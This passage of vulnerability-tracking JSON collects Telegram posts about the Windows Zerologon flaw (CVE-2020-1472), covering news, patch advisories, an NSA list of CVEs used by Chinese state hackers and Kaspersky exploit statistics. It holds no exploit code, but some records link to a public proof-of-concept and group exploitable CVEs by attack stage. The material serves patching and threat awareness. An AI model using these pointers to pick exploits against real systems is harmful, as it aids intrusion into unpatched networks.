"https://t.me/BleepingComputer/8146", "content": "Windows Zerologon PoC exploits allow domain takeover. Patch Now!\n\nResearchers have released exploits for the Windows Zerologon CVE-2020-1472 vulnerability that allow an attacker to take control of a Windows domain. Install patches now! [...]\n\nhttps://www.bleepingcomputer.com/news/microsoft/windows-zerologon-poc-exploits-allow-domain-takeover-patch-now/", "creation_timestamp": "2020-09-15T20:38:13.000000Z"}, {"uuid": "a38eeaa5-c461-433d-a1c5-3fe0488a2e44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/BleepingComputer/8310", "content": "Hackers used VPN flaws to access US govt elections support systems\n\nGovernment-backed hackers\u00a0have compromised and gained access to US elections support systems by chaining together VPN vulnerabilities and the recent Windows CVE-2020-1472 security flaw. [...]\n\nhttps://www.bleepingcomputer.com/news/security/hackers-used-vpn-flaws-to-access-us-govt-elections-support-systems/", "creation_timestamp": "2020-10-12T18:40:46.000000Z"}, {"uuid": "9024cea8-69c8-4468-a20c-2413cf24f708", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/alexmakus/3640", "content": "\u0442\u0443\u0442 \u0432\u0441\u044f\u0447\u0435\u0441\u043a\u0438 \u043f\u0440\u0438\u0437\u044b\u0432\u0430\u044e\u0442 \u0430\u0434\u043c\u0438\u043d\u043e\u0432 \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u0441\u0442\u0440\u0435\u0435 \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2020-1472 \u0432 Microsoft netlogon \n\nhttps://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc\n\nhttps://www.secura.com/blog/zero-logon\n\nhttps://github.com/SecuraBV/CVE-2020-1472", "creation_timestamp": "2020-09-15T15:27:25.000000Z"}, {"uuid": "7fc9e359-2eaf-43aa-9a7e-e40d9b88c437", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/hybgl/430", "content": "#windows #CVE #privesc #zerologon\n\n[ CVE-2020-1472  Netlogon authentication bypass testing ]\n\nhttps://github.com/SecuraBV/CVE-2020-1472\n\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438:  https://www.secura.com/pathtoimg.php?id=2055", "creation_timestamp": "2021-07-22T16:10:45.000000Z"}, {"uuid": "7376edc3-fc36-46ee-a1ed-cf9d40c66fde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/is_n3ws/36", "content": "\u0410\u041d\u0411 \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u043e \u0430\u0442\u0430\u043a\u0438 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0432\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u043e \u043e\u0442\u0447\u0435\u0442. Top-20 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\nhttps://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF\n\nGaining Remote Access: \n-----------------------------\nCVE-2019-11510: Arbitrary file read/Pulse Secure VPN\nCVE-2019-19781: RCE/Citrix ADC\nCVE-2020-8195/3/6: Unauthenticated access\nCVE-2019-0708: RCE on RDP server\nCVE-2020-5902: RCE in F5 BIG-IP\n\nAD:\n----\nCVE-2020-1472: #ZeroLogon\nCVE-2019-1040: NTLM relay bypass\n\nMDM: \n------\nCVE-2020-15505: MobileIron device management\n\nExploiting Public Facing Services:\n---------------- \nCVE-2020-1350: RCE/ DNS Servers #SigRed\nCVE-2018-6789: RCE/ Exim mail transfer\nCVE-2018-4939: RCE/ Adobe's Cold Fusion\n\nWorkstation Local Privilege Escalation:\n-------------------------\nCVE-2020-0601: ECC spoofing #CurveBall\nCVE-2019-0803: Win32k Elevation of Privilege\n\nInternal Applications:\n--------------------\nCVE-2020-0688: RCE/MS Exchange\nCVE-2020-2555: RCE/Oracle Weblogic\nCVE-2019-11580: RCE/Atlassian Crowd\nCVE-2019-18935: RCE/ASP.Net\nCVE-2015-4852: RCE/Apache\nCVE-2019-3396: Unauthorized Access/Confluence\nCVE-2020-10189: RCE/Desktop Central", "creation_timestamp": "2020-11-06T22:00:17.000000Z"}, {"uuid": "9fafaa2c-22f9-4046-ba38-92517df0d13d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/arpsyndicate/1694", "content": "#ExploitObserverAlert\n\nCVE-2020-1472\n\nDESCRIPTION: Exploit Observer has 414 entries related to CVE-2020-1472. An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.\n\nFIRST-EPSS: 0.974450000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-11T03:25:21.000000Z"}, {"uuid": "6778a585-c10e-4ab7-813c-1c632891a50c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/12GQmhdjAZoUy0KyEWtwA71DbE079snwo4quD3RJiXmYXw", "content": "", "creation_timestamp": "2020-09-16T06:13:02.000000Z"}, {"uuid": "abd1f127-c84a-4cf8-89bf-d3c83b5cd829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/7Qrvv0n_A492fFBBgAcKrfKClVFk6YoFPN9jHzyI2JtJfpE", "content": "", "creation_timestamp": "2020-10-01T10:36:08.000000Z"}, {"uuid": "0d52c406-1e9b-46ef-983a-694a124ccd58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/anwar1213xx/979", "content": "\u062b\u063a\u0631\u0627\u062a \u0644\u0625\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0648\u064a\u0646\u062f\u0648\u0632 :\n\n\u0643\u0644 \u0645\u0646 \u064a\u0633\u062a\u062e\u062f\u0645 \u0646\u0638\u0627\u0645 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0648\u064a\u0646\u062f\u0648\u0632 \u0623\u0648 \u062d\u0632\u0645\u0629 \u062a\u0637\u0628\u064a\u0642\u0627\u062a Microsoft Office \u064a\u062c\u0628 \u0639\u0644\u064a\u0647 \u0623\u0646 \u064a\u062d\u062f\u062b\u0647\u0645\u060c \u064a\u0648\u062c\u062f \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0635\u062f\u0631\u062a \u0644\u062a\u0631\u0642\u064a\u0639 120 \u062b\u063a\u0631\u0629 \u0645\u0646\u0647\u0645 18 \u062b\u063a\u0631\u0629 \u062f\u0631\u062c\u0629 \u062e\u0637\u0648\u0631\u062a\u0647\u0645 \u0645\u0635\u0646\u0641\u0647 \u0643\u0640 \"\u062d\u0631\u062c\u0629\" \u06482 \u0628\u0627\u0644\u0641\u0639\u0644 \u064a\u062a\u0645 \u0625\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645 \u0628\u0634\u0643\u0644 \u0643\u0628\u064a\u0631\n\u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u062a\u0639\u0631\u0636 \u062c\u0647\u0627\u0632\u0643 \u0644\u0644\u0625\u062e\u062a\u0631\u0627\u0642 \u0641\u064a \u0627\u0644\u062d\u0627\u0644\u0627\u062a \u0627\u0644\u062a\u0627\u0644\u064a\u0629:\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2020-1525 \u0648 CVE-2020-1585 \u0645\u0645\u0643\u0646 \u062a\u062a\u0633\u0628\u0628 \u0641\u064a \u0625\u062e\u062a\u0631\u0627\u0642 \u062c\u0647\u0627\u0632\u0643 \u0639\u0646 \u0637\u0631\u064a\u0642 \u062a\u0634\u063a\u064a\u0644 \u0645\u0644\u0641 \u0641\u064a\u062f\u064a\u0648.\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2020-1548 \u0645\u0645\u0643\u0646 \u062a\u062a\u0633\u0628\u0628 \u0641\u064a \u0625\u062e\u062a\u0631\u0627\u0642 \u062c\u0647\u0627\u0632\u0643 \u0639\u0646 \u0637\u0631\u064a\u0642 \u062a\u0634\u063a\u064a\u0644 \u0645\u0644\u0641 \u0635\u0648\u062a.\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2020-1560 \u0648 CVE-2020-1574 \u0645\u0645\u0643\u0646 \u062a\u062a\u0633\u0628\u0628 \u0641\u064a \u0625\u062e\u062a\u0631\u0627\u0642 \u062c\u0647\u0627\u0632\u0643 \u0639\u0646 \u0637\u0631\u064a\u0642 \u062a\u0634\u063a\u064a\u0644 \u0645\u0644\u0641 \u0635\u0648\u0631\u0629.\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2020-1483 \u0645\u0645\u0643\u0646 \u062a\u062a\u0633\u0628\u0628 \u0641\u0649 \u0625\u062e\u062a\u0631\u0627\u0642 \u062c\u0647\u0627\u0632\u0643 \u0625\u0630\u0627 \u0642\u0645\u062a \u0628\u0633\u062a\u062e\u062f\u0645 \u062a\u0637\u0628\u064a\u0642 Microsoft Outlook \u0641\u064a \u0625\u0633\u062a\u0644\u0627\u0645 \u0627\u0644\u0631\u0633\u0627\u0626\u0644.\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2020-1567 \u0645\u0645\u0643\u0646 \u062a\u062a\u0633\u0628\u0628 \u0641\u064a \u0625\u062e\u062a\u0631\u0627\u0642 \u062c\u0647\u0627\u0632\u0643 \u0625\u0630\u0627 \u062d\u0627\u0648\u0644\u062a \u0623\u0646 \u062a\u0642\u0648\u0645 \u0628\u062a\u062d\u0631\u064a\u0631 edit \u0644\u0635\u0641\u062d\u0629 HTML.\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2020-1380 \u0645\u0645\u0643\u0646 \u062a\u062a\u0633\u0628\u0628 \u0641\u064a \u0625\u062e\u062a\u0631\u0627\u0642 \u062c\u0647\u0627\u0632\u0643 \u0625\u0630\u0627 \u062d\u0627\u0648\u0644\u062a \u062a\u0641\u062a\u062d \u0645\u0648\u0642\u0639 \u0645\u0639\u064a\u0646 \u0639\u0644\u0649 \u0645\u062a\u0635\u0641\u062d Internet Explorer 11.\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2020-1472 \u0627\u0644\u0645\u0648\u062c\u0648\u062f\u0629 \u0641\u0649 \u0645\u0643\u0648\u0646 NetLogon \u0645\u0645\u0643\u0646 \u062a\u062a\u0633\u0628\u0628 \u0641\u0649 \u0631\u0641\u0639 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u062e\u062a\u0631\u0642 \u0648\u062a\u0633\u0645\u062d \u0644\u0647 \u0628\u0625\u062e\u062a\u0631\u0627\u0642 \u062c\u0647\u0627\u0632\u0643 \u0641\u064a \u062d\u0627\u0644\u0629 \u0645\u0627 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u062a\u0635\u0644 \u0639\u0644\u0649 Domain Controller (DC) \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0641\u0649 \u0627\u0644\u063a\u0627\u0644\u0628 \u062f\u0627\u062e\u0644 \u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a.\n\u0627\u0644\u062b\u063a\u0631\u0627\u0629 CVE-2020-1494 \u0648 CVE-2020-1495 \u0648 CVE-2020-1496 \u0648 CVE-2020-1504 \u0648 CVE-2020-1498 \u0645\u0645\u0643\u0646 \u0623\u0646 \u064a\u062a\u0633\u0628\u0628\u0648 \u0641\u0649 \u0625\u062e\u062a\u0631\u0627\u0642 \u062c\u0647\u0627\u0632\u0643 \u0627\u0646 \u0641\u062a\u062d\u062a \u0645\u0644\u0641 Excel sheet \u0639\u0644\u0649 \u0627\u0644\u0627\u0635\u062f\u0627\u0631 \u0627\u0644\u0645\u0635\u0627\u0628 \u0645\u0646 Microsoft Excel.\n\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2020-1571 \u0645\u0645\u0643\u0646 \u062a\u062a\u0633\u0628\u0628 \u0641\u0649 \u0631\u0641\u0639 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u062e\u062a\u0631\u0642 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0625\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0645\u0633\u0624\u0648\u0644 \u0639\u0646 \u062a\u0646\u0635\u064a\u0628 \u0646\u0633\u062e\u0629 \u0627\u0644\u0648\u064a\u0646\u062f\u0648\u0632 \u0646\u0641\u0633\u0647\u0627\n\nThe Yemeni ghost\nMy pride is crazy", "creation_timestamp": "2021-10-08T16:50:51.000000Z"}, {"uuid": "78ea6e33-696e-42e4-bd6a-0b2e9a4d11d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/true_secator/7103", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u041b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u0431\u043e\u043c\u0431\u0438\u0442\u044c \u043e\u0442\u0447\u0435\u0442\u0430\u043c\u0438, \u043d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u043f\u043e\u0434\u043e\u0433\u043d\u0430\u043b\u0438 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0443 \u043f\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0437\u0430 \u043f\u0435\u0440\u0432\u044b\u0439 \u043a\u0432\u0430\u0440\u0442\u0430\u043b 2025 \u0433\u043e\u0434\u0430.\n\n\u0412 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u043b\u0430\u0441\u044c \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0432 2024 \u0433\u043e\u0434\u0443, \u0442\u0430\u043a \u043a\u0430\u043a \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435 \u043c\u043e\u0433\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u043e\u0434\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044e\u0442 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0434\u0438\u043d\u0430\u043c\u0438\u043a\u0430 \u0438\u0445 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0432\u043e \u043c\u043d\u043e\u0433\u043e\u043c \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u0442 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0433\u043e\u0434\u044b.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c \u043c\u043d\u043e\u0433\u0438\u0435 CWE \u0438\u0437 TOP 10 \u0434\u043b\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 Microsoft \u0438 \u044f\u0434\u0440\u0430 Linux \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u044e\u0442 \u0438\u043b\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u043c\u0438, \u0430 \u0437\u043d\u0430\u0447\u0438\u0442, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u0441\u0445\u043e\u0436\u0438\u0445 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0430\u0445, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u0447\u0430\u0441\u0442\u043e \u043a \u00ab\u043f\u043e\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044e\u00bb \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432 \u0430\u0442\u0430\u043a \u0434\u043b\u044f Linux \u043d\u0430 Windows \u0438 \u043d\u0430\u043e\u0431\u043e\u0440\u043e\u0442.\n\n\u0412 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0430\u0442\u0430\u043a \u0441 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c\u0438 \u0434\u043b\u044f \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Windows \u0432\u044b\u0440\u043e\u0441\u043b\u043e \u043f\u043e \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u044e \u0441 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u043c \u043f\u0435\u0440\u0438\u043e\u0434\u043e\u043c \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u041a\u0430\u043a \u0438 \u043f\u0440\u0435\u0436\u0434\u0435, \u043b\u044c\u0432\u0438\u043d\u0430\u044f \u0434\u043e\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0431\u044b\u043b\u0430 \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Microsoft Office.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0447\u0430\u0449\u0435 \u0438\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u0434\u043b\u044f \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Windows \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0441\u0442\u0430\u0440\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c: CVE-2018-0802, CVE-2017-11882 (\u043e\u0431\u0435 RCE \u0432 Equation Editor), CVE-2017-0199 (Microsoft Office \u0438 WordPad).\n\n\u0412\u0441\u0435 \u0442\u0440\u0438 \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0438\u0441\u044c \u0441\u0430\u043c\u044b\u043c\u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u043c\u0438 \u043d\u0430 \u043f\u0440\u043e\u0442\u044f\u0436\u0435\u043d\u0438\u0438 2024 \u0433\u043e\u0434\u0430, \u0438 \u043c\u044b \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u043c, \u0447\u0442\u043e \u0442\u0430\u043a\u0430\u044f \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0438 \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c.\n\n\u0417\u0430 \u043d\u0438\u043c\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0442 \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0432 WinRAR \u0438 \u0432 \u0441\u0430\u043c\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows: CVE-2023-38831 (WinRAR), CVE-2024-35250 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430\u00a0ks.sys) \u0438 CVE-2022-3699 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 Lenovo Diagnostics).\n\n\u0414\u043b\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Linux \u0431\u043e\u043b\u044c\u0448\u0435 \u0432\u0441\u0435\u0433\u043e \u0431\u044b\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c: CVE-2022-0847 (Dirty Pipe), CVE-2019-13272 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043d\u0430\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439) \u0438 CVE-2021-3156 (\u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u0443\u0447\u0438 \u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u0435\u00a0sudo).\n\n\u0412 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043a\u0430\u043a \u0441\u0430\u043c\u043e\u0435 \u0441\u043b\u043e\u0436\u043d\u043e\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u043b\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u044b\u0439 \u0440\u043e\u0441\u0442 \u0447\u0438\u0441\u043b\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u043a \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430\u043c - \u044d\u0442\u0430 \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u043b\u0430\u0441\u044c \u0438 \u043d\u0430 \u043f\u0440\u043e\u0442\u044f\u0436\u0435\u043d\u0438\u0438 \u0432\u0441\u0435\u0433\u043e \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u0422\u0430\u043a\u0436\u0435 \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u043b\u0430\u0441\u044c \u0434\u043e\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft Office.\n\n\u0418\u0437\u0443\u0447\u0438\u0432 \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445 APT, \u0432 \u041b\u041a \u0432\u044b\u0434\u0435\u043b\u0438\u043b\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0435\u0441\u044f \u0432 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430: CVE-2025-0282, CVE-2024-21887 \u0438 CVE-2025-0283 (Ivanti Connect Secure), CVE-2020-1472 (Netlogon Windows), CVE-2023-46805 (Ivanti ICS), CVE-2023-48788 (Fortinet) \u0438 \u0434\u0440.\n\n\u041e\u0442\u043c\u0435\u0442\u0438\u043c, \u0447\u0442\u043e \u0432 TOP 10 \u0432\u0435\u0440\u043d\u0443\u043b\u0430\u0441\u044c \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Zerologon, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0443 \u0434\u043e\u043c\u0435\u043d\u0430.\n\n\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, 